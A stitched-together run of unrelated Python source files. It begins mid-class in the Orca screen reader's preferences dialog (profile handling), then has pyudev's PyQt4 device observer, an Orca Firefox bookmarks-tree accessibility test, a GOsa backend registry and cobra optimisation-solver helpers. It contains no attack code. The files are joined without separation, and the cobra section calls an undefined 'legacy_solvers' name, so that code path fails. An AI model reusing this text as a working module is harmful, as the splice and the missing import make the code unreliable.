        # Jump straight to the preferences section of the Orca help.
        orca.helpForOrca(page="preferences")

    def restoreSettings(self):
        """Restore the settings we saved away when opening the preferences
           dialog."""
        # Put the default voice's rate/pitch/gain back, in case the user
        # played with the sliders.
        defaultVoice = \
            _settingsManager.getSetting('voices')[settings.DEFAULT_VOICE]
        defaultVoice[acss.ACSS.RATE] = self.savedRate
        defaultVoice[acss.ACSS.AVERAGE_PITCH] = self.savedPitch
        defaultVoice[acss.ACSS.GAIN] = self.savedGain

    def saveBasicSettings(self):
        """Capture the basic speech settings (enablement, system, server
        and voices) from the dialog widgets into self.prefsDict."""
        if not self._isInitialSetup:
            # Undo any live slider changes before reading settings.
            self.restoreSettings()

        self.prefsDict["enableSpeech"] = \
            self.get_widget("speechSupportCheckButton").get_active()

        if self.speechSystemsChoice:
            self.prefsDict["speechServerFactory"] = \
                self.speechSystemsChoice.__name__

        if self.speechServersChoice:
            self.prefsDict["speechServerInfo"] = \
                self.speechServersChoice.getInfo()

        if self.defaultVoice is not None:
            voiceSettings = {
                settings.DEFAULT_VOICE: acss.ACSS(self.defaultVoice),
                settings.UPPERCASE_VOICE: acss.ACSS(self.uppercaseVoice),
                settings.HYPERLINK_VOICE: acss.ACSS(self.hyperlinkVoice),
                settings.SYSTEM_VOICE: acss.ACSS(self.systemVoice),
            }
            self.prefsDict["voices"] = voiceSettings

    def applyButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the applyButton
           GtkButton widget. The user has clicked the Apply button.
           Write out the users preferences. If GNOME accessibility hadn't
           previously been enabled, warn the user that they will need to
           log out. Shut down any active speech servers that were started.
           Reload the users preferences to get the new speech, braille and
           key echo value to take effect. Do not dismiss the configuration
           window.

        Arguments:
        - widget: the component that generated the signal.
        """
        # Capture the basic speech settings into self.prefsDict first.
        self.saveBasicSettings()

        activeProfile = self.getComboBoxList(self.profilesCombo)
        startingProfile = self.getComboBoxList(self.startingProfileCombo)

        # 'profile' and 'activeProfile' are deliberately kept in sync.
        self.prefsDict['profile'] = activeProfile
        self.prefsDict['activeProfile'] = activeProfile
        self.prefsDict['startingProfile'] = startingProfile
        _settingsManager.setStartingProfile(startingProfile)

        # Persist, then reload so the new values take effect immediately.
        self.writeUserPreferences()

        orca.loadUserSettings(self.script)

        braille.checkBrailleSetting()

        self._initSpeechState()

        self._populateKeyBindings()

        self.__initProfileCombo()

    def cancelButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the cancelButton
           GtkButton widget. The user has clicked the Cancel button.
           Don't write out the preferences. Destroy the configuration window.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Revert in-dialog changes as if the window had been closed, then
        # tear the window down.
        self.windowClosed(widget)
        self.get_widget("orcaSetupWindow").destroy()

    def okButtonClicked(self, widget=None):
        """Signal handler for the "clicked" signal for the okButton
           GtkButton widget. The user has clicked the OK button.
           Write out the users preferences. If GNOME accessibility hadn't
           previously been enabled, warn the user that they will need to
           log out. Shut down any active speech servers that were started.
           Reload the users preferences to get the new speech, braille and
           key echo value to take effect. Hide the configuration window.

        Arguments:
        - widget: the component that generated the signal.
        """

        # OK behaves like Apply, plus dismissing the dialog.
        self.applyButtonClicked(widget)
        self._cleanupSpeechServers()
        self.get_widget("orcaSetupWindow").destroy()

    def windowClosed(self, widget):
        """Signal handler for the "closed" signal for the orcaSetupWindow
           GtkWindow widget. Effectively the same as pressing Cancel:
           re-select the saved speech system/server choices, clean up any
           speech servers we started, and restore the saved settings.

        Arguments:
        - widget: the component that generated the signal.
        """

        speechFactory = _settingsManager.getSetting('speechServerFactory')
        if speechFactory:
            self._setSpeechSystemsChoice(speechFactory)

        speechServer = _settingsManager.getSetting('speechServerInfo')
        if speechServer:
            self._setSpeechServersChoice(speechServer)

        self._cleanupSpeechServers()
        self.restoreSettings()

    def windowDestroyed(self, widget):
        """Signal handler for the "destroyed" signal for the orcaSetupWindow
           GtkWindow widget. Drops orca_state.orcaOS so that the GUI is
           rebuilt from the GtkBuilder file the next time the user wants
           to display the configuration GUI.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Detach models and hide the tree views before the window goes away.
        for treeView in (self.keyBindView,
                         self.getTextAttributesView,
                         self.pronunciationView):
            treeView.set_model(None)
            treeView.set_headers_visible(False)
            treeView.hide()
        orca_state.orcaOS = None

    def showProfileGUI(self, widget):
        """Show profile Dialog to add a new one.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Delegates to the profile dialog module; presumably it calls back
        # into saveProfile() on confirmation - confirm in orca_gui_profile.
        orca_gui_profile.showProfileUI(self)

    def saveProfile(self, profileToSaveLabel):
        """Creates a new profile based on the name profileToSaveLabel and
        updates the Preferences dialog combo boxes accordingly.

        Arguments:
        - profileToSaveLabel: the user-visible name of the new profile.
        """

        if not profileToSaveLabel:
            return
        # Internal profile name: lower-cased label, spaces as underscores.
        profileToSave = profileToSaveLabel.replace(' ', '_').lower()
        # Profiles are [label, internal-name] pairs throughout this dialog.
        profile = [profileToSaveLabel, profileToSave]

        def saveActiveProfile(newProfile = True):
            # Persist the current settings under `profile`, optionally
            # appending it to (and selecting it in) the profiles combo.
            if newProfile:
                activeProfileIter = self.profilesComboModel.append(profile)
                self.profilesCombo.set_active_iter(activeProfileIter)

            self.prefsDict['profile'] = profile
            self.prefsDict['activeProfile'] = profile
            self.saveBasicSettings()
            self.writeUserPreferences()

        availableProfiles = [p[1] for p in self.__getAvailableProfiles()]
        if isinstance(profileToSave, str) \
                and profileToSave != '' \
                and not profileToSave in availableProfiles \
                and profileToSave != self._defaultProfile[1]:
            # Brand-new name: create and activate it right away.
            saveActiveProfile()
        else:
            # The name collides with an existing profile (or the default
            # one); ask the user whether to overwrite it.
            if profileToSave is not None:
                message = guilabels.PROFILE_CONFLICT_MESSAGE % \
                    ("<b>%s</b>" % GLib.markup_escape_text(profileToSaveLabel))
                dialog = Gtk.MessageDialog(None,
                        Gtk.DialogFlags.MODAL,
                        type=Gtk.MessageType.INFO,
                        buttons=Gtk.ButtonsType.YES_NO)
                dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_CONFLICT_LABEL)
                dialog.format_secondary_markup(message)
                dialog.set_title(guilabels.PROFILE_CONFLICT_TITLE)
                response = dialog.run()
                if response == Gtk.ResponseType.YES:
                    dialog.destroy()
                    saveActiveProfile(False)
                else:
                    dialog.destroy()
                

    def removeProfileButtonClicked(self, widget):
        """Remove profile button clicked handler

        If we removed the last profile, a default one will automatically get
        added back by the settings manager.

        Arguments:
        - widget: the component that generated the signal.
        """

        oldProfile = self.getComboBoxList(self.profilesCombo)

        # Ask for confirmation before removing the selected profile.
        message = guilabels.PROFILE_REMOVE_MESSAGE % \
            ("<b>%s</b>" % GLib.markup_escape_text(oldProfile[0]))
        dialog = Gtk.MessageDialog(self.window, Gtk.DialogFlags.MODAL,
                                   type=Gtk.MessageType.INFO,
                                   buttons=Gtk.ButtonsType.YES_NO)
        dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_REMOVE_LABEL)
        dialog.format_secondary_markup(message)
        if dialog.run() == Gtk.ResponseType.YES:
            # If we remove the currently used starting profile, fallback on
            # the first listed profile, or the default one if there's
            # nothing better
            newStartingProfile = self.prefsDict.get('startingProfile')
            if not newStartingProfile or newStartingProfile == oldProfile:
                newStartingProfile = self._defaultProfile
                for row in self.profilesComboModel:
                    # row[:] copies the combo model row into a plain list
                    # so it compares against the [label, name] pairs.
                    rowProfile = row[:]
                    if rowProfile != oldProfile:
                        newStartingProfile = rowProfile
                        break
            # Update the current profile to the active profile unless we're
            # removing that one, in which case we use the new starting
            # profile
            newProfile = self.prefsDict.get('activeProfile')
            if not newProfile or newProfile == oldProfile:
                newProfile = newStartingProfile

            _settingsManager.removeProfile(oldProfile[1])
            self.loadProfile(newProfile)

            # Make sure nothing is referencing the removed profile anymore
            startingProfile = self.prefsDict.get('startingProfile')
            if not startingProfile or startingProfile == oldProfile:
                self.prefsDict['startingProfile'] = newStartingProfile
                _settingsManager.setStartingProfile(newStartingProfile)
                self.writeUserPreferences()

        dialog.destroy()

    def loadProfileButtonClicked(self, widget):
        """Signal handler for the "clicked" signal of the load-profile
        button: confirm with the user, then load the selected profile.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self._isInitialSetup:
            return

        dialog = Gtk.MessageDialog(None,
                Gtk.DialogFlags.MODAL,
                type=Gtk.MessageType.INFO,
                buttons=Gtk.ButtonsType.YES_NO)
        dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_LOAD_LABEL)
        dialog.format_secondary_markup(guilabels.PROFILE_LOAD_MESSAGE)

        userResponse = dialog.run()
        dialog.destroy()
        if userResponse == Gtk.ResponseType.YES:
            self.loadSelectedProfile()

    def loadSelectedProfile(self):
        """Load selected profile.

        Loads the profile currently selected in the profiles combo box.
        """

        activeProfile = self.getComboBoxList(self.profilesCombo)
        self.loadProfile(activeProfile)

    def loadProfile(self, profile):
        """Load profile.

        Arguments:
        - profile: a [label, internal-name] pair identifying the profile
          to activate.
        """

        # Capture the current settings before switching away from them.
        self.saveBasicSettings()

        self.prefsDict['activeProfile'] = profile
        _settingsManager.setProfile(profile[1])
        self.prefsDict = _settingsManager.getGeneralSettings(profile[1])

        # Reload user settings, skipping the usual reload announcement.
        orca.loadUserSettings(skipReloadMessage=True)

        # Refresh every page of the dialog to reflect the new profile.
        self._initGUIState()

        braille.checkBrailleSetting()

        self._initSpeechState()

        self._populateKeyBindings()

        self.__initProfileCombo()


# -*- coding: utf-8 -*-
# Copyright (C) 2010, 2011, 2012, 2013 Sebastian Wiesner <lunaryorn@gmail.com>

# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.

# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.  See the GNU Lesser General Public License
# for more details.

# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

# pylint: disable=anomalous-backslash-in-string

"""
    pyudev.pyqt4
    ============

    PyQt4 integration.

    :class:`MonitorObserver` integrates device monitoring into the PyQt4\_
    mainloop by turning device events into Qt signals.

    :mod:`PyQt4.QtCore` from PyQt4\_ must be available when importing this
    module.

    .. _PyQt4: http://riverbankcomputing.co.uk/software/pyqt/intro

    .. moduleauthor::  Sebastian Wiesner  <lunaryorn@gmail.com>
"""


from __future__ import (print_function, division, unicode_literals,
                        absolute_import)

from PyQt4.QtCore import QSocketNotifier, QObject, pyqtSignal

from pyudev._util import text_type
from pyudev.core import Device
from pyudev._qt_base import QUDevMonitorObserverMixin, MonitorObserverMixin


class MonitorObserver(QObject, MonitorObserverMixin):
    """An observer for device events integrating into the :mod:`PyQt4` mainloop.

    This class inherits :class:`~PyQt4.QtCore.QObject` to turn device events
    into Qt signals:

    >>> from pyudev import Context, Monitor
    >>> from pyudev.pyqt4 import MonitorObserver
    >>> context = Context()
    >>> monitor = Monitor.from_netlink(context)
    >>> monitor.filter_by(subsystem='input')
    >>> observer = MonitorObserver(monitor)
    >>> def device_event(device):
    ...     print('event {0} on device {1}'.format(device.action, device))
    >>> observer.deviceEvent.connect(device_event)
    >>> monitor.start()

    This class is a child of :class:`~PyQt4.QtCore.QObject`.

    """

    #: emitted upon arbitrary device events
    deviceEvent = pyqtSignal(Device)

    def __init__(self, monitor, parent=None):
        """
        Observe the given ``monitor`` (a :class:`~pyudev.Monitor`):

        ``parent`` is the parent :class:`~PyQt4.QtCore.QObject` of this
        object.  It is passed unchanged to the inherited constructor of
        :class:`~PyQt4.QtCore.QObject`.
        """
        # QObject.__init__ is called directly rather than via super().
        QObject.__init__(self, parent)
        # Wire the monitor into the Qt mainloop; the mixin presumably
        # watches the monitor's fd using the supplied QSocketNotifier
        # class - see pyudev._qt_base.MonitorObserverMixin.
        self._setup_notifier(monitor, QSocketNotifier)


class QUDevMonitorObserver(QObject, QUDevMonitorObserverMixin):
    """An observer for device events integrating into the :mod:`PyQt4` mainloop.

    .. deprecated:: 0.17
       Will be removed in 1.0.  Use :class:`MonitorObserver` instead.

    """

    #: emitted upon arbitrary device events
    deviceEvent = pyqtSignal(text_type, Device)
    #: emitted, if a device was added
    deviceAdded = pyqtSignal(Device)
    #: emitted, if a device was removed
    deviceRemoved = pyqtSignal(Device)
    #: emitted, if a device was changed
    deviceChanged = pyqtSignal(Device)
    #: emitted, if a device was moved
    deviceMoved = pyqtSignal(Device)

    def __init__(self, monitor, parent=None):
        """
        Observe the given ``monitor`` (a :class:`~pyudev.Monitor`):

        ``parent`` is the parent :class:`~PyQt4.QtCore.QObject` of this
        object.  It is passed unchanged to the inherited constructor of
        :class:`~PyQt4.QtCore.QObject`.
        """
        # QObject.__init__ is called directly rather than via super().
        QObject.__init__(self, parent)
        # Wire the monitor into the Qt mainloop; the mixin presumably
        # watches the monitor's fd using the supplied QSocketNotifier
        # class - see pyudev._qt_base.QUDevMonitorObserverMixin.
        self._setup_notifier(monitor, QSocketNotifier)

#!/usr/bin/python

"""Test of tree output using Firefox."""

from macaroon.playback import *
import utils

# Drive Firefox's bookmarks Library window and assert Orca's braille and
# speech presentation while navigating the bookmarks tree.
sequence = MacroSequence()

# Setup: open the bookmarks Library (presumably via <Alt>b) and move
# focus near the tree; the pauses give the application time to settle.
sequence.append(PauseAction(3000))
sequence.append(KeyComboAction("<Alt>b"))
sequence.append(KeyComboAction("Return"))
sequence.append(KeyComboAction("Tab"))
sequence.append(KeyComboAction("Tab"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Tab"))
sequence.append(PauseAction(3000))

# Each step below records Orca's output for one keystroke and asserts
# the exact braille/speech presentation.
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>Tab"))
sequence.append(utils.AssertPresentationAction(
    "1. Shift Tab for tree",
    ["BRAILLE LINE:  'Firefox application Library frame All Bookmarks expanded TREE LEVEL 1'",
     "     VISIBLE:  'All Bookmarks expanded TREE LEVE', cursor=1",
     "SPEECH OUTPUT: 'All Bookmarks.'",
     "SPEECH OUTPUT: 'expanded.'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "2. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Toolbar TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Toolbar TREE LEVEL 2', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar.'",
     "SPEECH OUTPUT: 'tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "3. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu.'",
     "SPEECH OUTPUT: 'collapsed.'"]))

# KP_Enter triggers Orca's "Where Am I" review of the current item.
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "4. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu tree item.'",
     "SPEECH OUTPUT: '2 of 3.'",
     "SPEECH OUTPUT: 'collapsed tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
    "5. Right Arrow to expand folder", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'expanded'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "6. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu tree item.'",
     "SPEECH OUTPUT: '2 of 3.'",
     "SPEECH OUTPUT: 'expanded tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "7. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame GNOME TREE LEVEL 3'",
     "     VISIBLE:  'GNOME TREE LEVEL 3', cursor=1",
     "SPEECH OUTPUT: 'GNOME.'",
     "SPEECH OUTPUT: 'tree level 3'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "8. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame GNOME TREE LEVEL 3'",
     "     VISIBLE:  'GNOME TREE LEVEL 3', cursor=1",
     "SPEECH OUTPUT: 'GNOME tree item.'",
     "SPEECH OUTPUT: '1 of 2.'",
     "SPEECH OUTPUT: 'tree level 3'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "9. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu.'",
     "SPEECH OUTPUT: 'expanded.'",
     "SPEECH OUTPUT: 'tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
    "10. Left Arrow to collapse folder", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'collapsed'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "11. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Toolbar TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Toolbar TREE LEVEL 2', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar.'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "12. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame All Bookmarks expanded TREE LEVEL 1'",
     "     VISIBLE:  'All Bookmarks expanded TREE LEVE', cursor=1",
     "SPEECH OUTPUT: 'All Bookmarks.'",
     "SPEECH OUTPUT: 'expanded.'",
     "SPEECH OUTPUT: 'tree level 1'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
    "13. Tab back to tree table",
    ["BRAILLE LINE:  'Firefox application Library frame tree table Bookmarks Toolbar   table row TREE LEVEL 1'",
     "     VISIBLE:  'Bookmarks Toolbar   table row TR', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar  '"]))

# Close the Library window and report the assertion results.
sequence.append(KeyComboAction("<Alt>F4"))

sequence.append(utils.AssertionSummaryAction())
sequence.start()

# This file is part of the GOsa framework.
#
#  http://gosa-project.org
#
# Copyright:
#  (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.

import pkg_resources

from gosa.common.components import PluginRegistry
from gosa.common.utils import N_
from gosa.common.error import GosaErrorHandler as C


# Register the error codes raised by this module with the global GOsa
# error handler.
C.register_codes(dict(
    BACKEND_NOT_FOUND=N_("Backend '%(topic)s' not found"),
    ))


class ObjectBackendRegistry(object):
    """Registry of the available GOsa object backends.

    Backends are discovered through the ``gosa.object.backend`` entry
    point group and shared process-wide via the class-level ``backends``
    mapping. Use :meth:`getInstance` to obtain the singleton.
    """

    # Singleton instance, created lazily by getInstance().
    instance = None
    # Backend class name -> backend instance, shared by all registries.
    backends = {}
    # Name of the attribute that carries the entry UUID.
    uuidAttr = "entryUUID"
    # Lazily resolved ObjectIndex plugin (see __get_index).
    __index = None

    def __init__(self):
        # Instantiate every backend advertised through entry points and
        # register it under its class name.
        for entry in pkg_resources.iter_entry_points("gosa.object.backend"):
            backend_class = entry.load()
            ObjectBackendRegistry.backends[backend_class.__name__] = \
                backend_class()

    def __get_index(self):
        # Fetch and cache the ObjectIndex plugin on first use.
        if self.__index is None:
            self.__index = PluginRegistry.getInstance("ObjectIndex")
        return self.__index

    def dn2uuid(self, backend, dn, from_db_only=False):
        """Resolve *dn* to a UUID via *backend*, optionally consulting
        the object index when the backend cannot resolve it."""
        uuid = ObjectBackendRegistry.backends[backend].dn2uuid(dn)
        if uuid is None and from_db_only is True:
            matches = self.__get_index().search({'dn': dn}, {'uuid': 1})
            if len(matches) == 1:
                # NOTE(review): the projection requests 'uuid' but the
                # result is read via '_uuid' - confirm against the index
                # document schema.
                uuid = matches[0]['_uuid']
        return uuid

    def uuid2dn(self, backend, uuid, from_db_only=False):
        """Resolve *uuid* to a DN via *backend*, optionally consulting
        the object index when the backend cannot resolve it."""
        dn = ObjectBackendRegistry.backends[backend].uuid2dn(uuid)
        if dn is None and from_db_only is True:
            matches = self.__get_index().search({'uuid': uuid}, {'dn': 1})
            if len(matches) == 1:
                dn = matches[0]['dn']
        return dn

    def get_timestamps(self, backend, dn):
        """Return the timestamps reported by *backend* for *dn*."""
        return ObjectBackendRegistry.backends[backend].get_timestamps(dn)

    @staticmethod
    def getInstance():
        """Return the shared registry, creating it on first use."""
        if not ObjectBackendRegistry.instance:
            ObjectBackendRegistry.instance = ObjectBackendRegistry()
        return ObjectBackendRegistry.instance

    @staticmethod
    def getBackend(name):
        """Return the backend registered as *name*.

        Raises ValueError when no such backend is known."""
        if name not in ObjectBackendRegistry.backends:
            raise ValueError(C.make_error("BACKEND_NOT_FOUND", name))
        return ObjectBackendRegistry.backends[name]

# -*- coding: utf-8 -*-

"""Additional helper functions for the optlang solvers.

All functions integrate well with the context manager, meaning that
all operations defined here are automatically reverted when used in a
`with model:` block.

The functions defined here together with the existing model functions should
allow you to implement custom flux analysis methods with ease.
"""

from __future__ import absolute_import

import re
from functools import partial
from collections import namedtuple
from types import ModuleType
from warnings import warn

import optlang
from optlang.symbolics import Basic, Zero

from cobra.exceptions import OptimizationError, OPTLANG_TO_EXCEPTIONS_DICT
from cobra.util.context import get_context


class SolverNotFound(Exception):
    """Raised when no (suitable) optimization solver can be located."""


# Map each solver name (e.g. "glpk") to its optlang interface module,
# for every "*_interface" attribute optlang exposes.
solvers = {match.split("_")[0]: getattr(optlang, match)
           for match in dir(optlang) if "_interface" in match}

# Defines all the QP solvers implemented in optlang.
qp_solvers = ["cplex"]  # QP in gurobi not implemented yet


def linear_reaction_coefficients(model, reactions=None):
    """Coefficient for the reactions in a linear objective.

    Parameters
    ----------
    model : cobra model
        the model object that defined the objective
    reactions : list
        an optional list for the reactions to get the coefficients for. All
        reactions if left missing.

    Returns
    -------
    dict
        A dictionary mapping each reaction object to its objective
        coefficient. Empty if there are no linear terms in the objective.
    """
    linear_coefficients = {}
    if not reactions:
        reactions = model.reactions
    try:
        coefficients = \
            model.solver.objective.expression.as_coefficients_dict()
    except AttributeError:
        # The objective expression exposes no coefficient dict.
        return linear_coefficients
    for reaction in reactions:
        forward = coefficients.get(reaction.forward_variable, 0)
        reverse = coefficients.get(reaction.reverse_variable, 0)
        # Only count reactions whose forward and reverse variables carry
        # exactly opposite, non-zero coefficients.
        if forward != 0 and forward == -reverse:
            linear_coefficients[reaction] = float(forward)
    return linear_coefficients


def _valid_atoms(model, expression):
    """Check whether a sympy expression references the correct variables.

    Parameters
    ----------
    model : cobra.Model
        The model in which to check for variables.
    expression : sympy.Basic
        A sympy expression.

    Returns
    -------
    boolean
        True if all referenced variables are contained in model, False
        otherwise.
    """
    for atom in expression.atoms(optlang.interface.Variable):
        if atom.problem is not model.solver:
            return False
    return True


def set_objective(model, value, additive=False):
    """Set the model objective.

    Parameters
    ----------
    model : cobra model
       The model to set the objective for
    value : model.problem.Objective,
            e.g. optlang.glpk_interface.Objective, sympy.Basic or dict

        If the model objective is linear, the value can be a new Objective
        object or a dictionary with linear coefficients where each key is a
        reaction and the element the new coefficient (float).

        If the objective is not linear and `additive` is true, only values
        of class Objective.

    additive : bool
        If true, add the terms to the current objective, otherwise start with
        an empty objective.

    Raises
    ------
    ValueError
        If a coefficient dict is supplied but the current objective is not
        linear.
    TypeError
        If `value` is neither a dict, a sympy expression nor an Objective.
    """
    interface = model.problem
    # Snapshot the current objective (expression and direction) so it can
    # be restored when a surrounding `with model:` block exits.
    reverse_value = model.solver.objective.expression
    reverse_value = interface.Objective(
        reverse_value, direction=model.solver.objective.direction,
        sloppy=True)

    if isinstance(value, dict):
        if not model.objective.is_Linear:
            # NOTE(review): raised when a coefficient dict is supplied for
            # a non-linear objective; the message wording is confusing.
            raise ValueError('can only update non-linear objectives '
                             'additively using object of class '
                             'model.problem.Objective, not %s' %
                             type(value))

        if not additive:
            # Start from an all-zero objective, keeping the direction.
            model.solver.objective = interface.Objective(
                Zero, direction=model.solver.objective.direction)
        for reaction, coef in value.items():
            # A linear term sets opposite coefficients on the forward and
            # reverse variables of the reaction.
            model.solver.objective.set_linear_coefficients(
                {reaction.forward_variable: coef,
                 reaction.reverse_variable: -coef})

    elif isinstance(value, (Basic, optlang.interface.Objective)):
        if isinstance(value, Basic):
            value = interface.Objective(
                value, direction=model.solver.objective.direction,
                sloppy=False)
        # Check whether expression only uses variables from current model
        # clone the objective if not, faster than cloning without checking
        if not _valid_atoms(model, value.expression):
            value = interface.Objective.clone(value, model=model.solver)

        if not additive:
            model.solver.objective = value
        else:
            model.solver.objective += value.expression
    else:
        raise TypeError(
            '%r is not a valid objective for %r.' % (value, model.solver))

    context = get_context(model)
    if context:
        def reset():
            # Restore the snapshotted objective and its direction.
            model.solver.objective = reverse_value
            model.solver.objective.direction = reverse_value.direction

        context(reset)


def interface_to_str(interface):
    """Give a string representation for an optlang interface.

    Parameters
    ----------
    interface : string, ModuleType
        Full name of the interface in optlang or cobra representation.
        For instance 'optlang.glpk_interface' or 'optlang-glpk'.

    Returns
    -------
    string
       The name of the interface as a string
    """
    if isinstance(interface, ModuleType):
        interface = interface.__name__
    # The previous pattern, r"optlang.|.interface", used unescaped dots
    # that act as wildcards and stripped one arbitrary character (e.g.
    # any char preceding "interface").  Match the intended separators
    # explicitly instead: a "optlang." / "optlang-" prefix and a
    # "_interface" suffix.
    return re.sub(r"optlang[-.]|_interface", "", interface)


def get_solver_name(mip=False, qp=False):
    """Select a solver for a given optimization problem.

    Parameters
    ----------
    mip : bool
        Does the solver require mixed integer linear programming capabilities?
    qp : bool
        Does the solver require quadratic programming capabilities?

    Returns
    -------
    string
        The name of feasible solver.

    Raises
    ------
    SolverNotFound
        If no suitable solver could be found.
    """
    if not solvers:
        raise SolverNotFound("no solvers installed")
    # Preference orders; extend these as optlang gains solver support.
    mip_order = ["gurobi", "cplex", "glpk"]
    lp_order = ["glpk", "cplex", "gurobi"]
    qp_order = ["cplex"]

    # QP capability dominates the decision (mip is irrelevant once qp is set).
    if not (mip is False and qp is False) and qp:
        for candidate in qp_order:
            if candidate in solvers:
                return candidate
        raise SolverNotFound("no qp-capable solver found")

    if mip is False and qp is False:
        # Plain LP: fall back to whatever is installed if none of the
        # preferred solvers are available.
        for candidate in lp_order:
            if candidate in solvers:
                return candidate
        return list(solvers)[0]

    for candidate in mip_order:
        if candidate in solvers:
            return candidate
    raise SolverNotFound("no mip-capable solver found")


def choose_solver(model, solver=None, qp=False):
    """Pick a solver compatible with the model and required capabilities.

    Respects ``model.problem`` when no explicit solver is requested.

    Parameters
    ----------
    model : a cobra model
        The model for which to choose the solver.
    solver : str, optional
        The name of the solver to be used. Optlang solvers should be prefixed
        by "optlang-", for instance "optlang-glpk". Any other name selects a
        legacy (old cobra) solver.
    qp : boolean, optional
        Whether the solver needs Quadratic Programming capabilities.

    Returns
    -------
    legacy : boolean
        True when the returned solver is a legacy cobra solver, False for an
        optlang interface.
    solver : a cobra or optlang solver interface
        A valid solver for the problem.

    Raises
    ------
    SolverNotFound
        If no suitable solver could be found.
    """
    legacy = False
    if solver is None:
        solver = model.problem
    elif "optlang-" in solver:
        solver = solvers[interface_to_str(solver)]
    else:
        legacy = True
        solver = legacy_solvers.solver_dict[solver]

    # QP capability is only verified for optlang interfaces, since the old
    # interface interprets None differently; swap in a QP-capable solver
    # when the chosen one cannot handle QP.
    if qp and interface_to_str(solver) not in qp_solvers:
        solver = solvers[get_solver_name(qp=True)]

    return legacy, solver


def add_cons_vars_to_problem(model, what, **kwargs):
    """Add variables and constraints to a Model's solver object.

    Useful for variables and constraints that can not be expressed with
    reactions and lower/upper bounds. Integrates with the Model's context
    manager so the addition is undone when the context exits.

    Parameters
    ----------
    model : a cobra model
       The model to which to add the variables and constraints.
    what : list or tuple of optlang variables or constraints.
       The variables or constraints to add to the model. Must be of class
       `model.problem.Variable` or `model.problem.Constraint`.
    **kwargs : keyword arguments
        passed to solver.add()
    """
    model.solver.add(what, **kwargs)

    # Register the inverse operation so leaving the model context reverts us.
    context = get_context(model)
    if context:
        context(partial(model.solver.remove, what))


